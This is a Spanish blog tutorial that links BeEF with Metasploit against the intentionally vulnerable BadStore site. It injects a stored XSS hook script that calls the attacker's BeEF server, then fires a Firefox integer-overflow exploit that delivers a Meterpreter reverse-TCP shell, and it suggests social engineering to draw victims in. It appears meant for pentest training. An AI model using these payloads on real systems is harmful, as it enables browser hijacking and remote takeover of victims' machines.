jueves, 14 de marzo de 2013

BeeF + Metasploit


Vamos a integrar BeEF con Metasploit, para ello necesitamos editar el archivo config.yaml ubicado en/pentest/web/beef


En la línea
metasploit:
enable: true



Grabamos y luego nos dirigimos al directorio /pentest/web/beef/extensions/metasploit y editamos el archivo config.yaml



Modificamos las línea como se muestran a continuación, dando la IP de nuestra máquina que aloja BeEF, en este caso BT5R3, grabamos y salimos.





PASO 2


Una vez hecho las configuraciones en BeEF ejecutamos nuestro Metasploit de la siguiente manera:







Esperamos hasta que cargue por completo Metasploit y en la línea de comandos ejecutar lo siguiente:


msf> load msgrpc SeverHost=192.168.0.20 Pass=beef


Recuerden que la IP fue la que colocamos en el archive config.yaml y también seteamos nuestro password, en este caso “beef”

Listo ya tenemos los plugin a la espera de se utilizados en BeEF






PASO 3:


Ejecutamos BeEF de la siguiente manera:





En nuestro navegador ingresamos a la siguiente dirección URL para acceder al panel de control.








Como observamos nos hay ninguna máquina zombi.


PASO 4:


Hasta aquí tenemos casi el 40% de nuestro ataque, pero para concretarlo necesitamos una carnada, en este caso BADSTORE será el sitio ya que posee vulnerabilidades XSS en su codificación.





Bien vamos a ir al libro de visitas para firmar y a la vez cargar nuestro script “hook,js” (la carnada)
Manos a la obra <script src=http://ip_bactrack_beef:3000/hook.js></script>








PASO 5:


Pues aquí nos tocaría esperar que nuestra víctima firme el libro de visitas para que se convierta en zombi de nuestro BeEF







No tenemos tan mala suerte y una víctima procedió a firmar el libro de visitas, aquí se recomendaría publicitarlo por algún método de ingeniería social.


PASO 6:


De vuelta a nuestro panel de control de BeEF nos damos cuenta que ya tenemos objetivos zombis, nuestra víctima con IP 192.168.0.100








En la pestaña Detalles podemos revisar las características del sistema zombi, y con ello podremos enfocarnos en las vulnerabilidades que presenta el sistema objetivo.





PASO 7:


Ahora que tenemos más claro las características de nuestra víctima nos dirigimos a la pestaña decomandos / Metasploit








Escogemos Mozilla Firefox Array.reduceRight() Integer Overflow y llenamos lo siguiente:


SRVHOST: 192.168.0.20 (ip de nuestra máquina BT)
SRVPORT: 8080
PAYLOAD: windows/meterpreter/reverse_tcp
LPORT: 4444 (si estuviera ocupado escoger otro)
EXITFUNC: process







PASO 8:


Nos dirigimos a la consola de Metasploit y nos damos cuenta que tenemos session.
Probamos con los comandos:


meterpreter>getuid
meterpreter>sysinfo




Fuente: Th3h@Ck¡_@dM¡n
Share:

1 comentario:

  1. Que buen Post me encanta, gracias. Sobre todo muy bien explicado ;)

    ResponderEliminar

Labels

Analisis (6) Android (1) Auditoria (15) BruteFoce (7) centOS (1) Cloudflare (3) DDos (1) Distros (5) Exploits (3) firewall (1) hacking (11) Herramientas (126) Incapsula (1) lfi (1) Malware (2) Pentest (49) Perl (2) Proxys (1) python (10) Scan Sql (1) Seguridad (52) Windows (1) Wireless (5) Wordpress (1) XSS (5)

FOLLOWME


Translate

Followers